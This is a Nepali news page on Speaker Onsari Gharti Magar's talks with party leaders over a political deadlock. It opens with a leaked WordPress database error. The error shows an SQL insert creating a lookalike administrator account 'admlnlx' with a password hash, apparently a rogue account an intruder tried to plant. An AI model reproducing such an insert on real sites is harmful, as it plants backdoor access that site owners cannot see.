WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1n5XzYaKti3vkTT4dTmGm58.RDxFU.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 23:03:47', '', 'admlnlx', 'admlnlx')
काठमान्डौं,मंसिर २३–
राजनीतिक गतिरोध अन्त्य गर्न सभामुख ओनसरी घर्तीमगरले प्रमुख राजनीतिक दलका शीर्ष नेतासँग छलफल गर्दै छिन् ।
सभामुख घर्तीले आज दिउँसो नेपाली कांग्रेसका सभापति शेरबहादुर देउवा र नेकपा(एमाले)का अध्यक्ष तथा प्रमुख प्रतिपक्षी दलका नेता केपी शर्मा ओलीसँग छलफल गर्ने कार्यक्रम रहेकाे उनका प्रेस सल्लाहकार बविन शर्माले जानकारी दिए ।
सभामुख घर्तीले प्रधानमन्त्री पुष्पकमल दाहाल‘प्रचण्ड’सँग भने शुक्रबार छलफल गर्ने कार्यक्रम तय गरिएको छ । सरकारले ल्याएको संविधान संशोधनपछि उत्पन्न परिस्थिति, राजनीतिक दलबीचमा देखिएको संवादहीनता, महाअभियोग र आगामी निर्वाचन लगायतका विषयमा छलफल हुने जनाइएको छ ।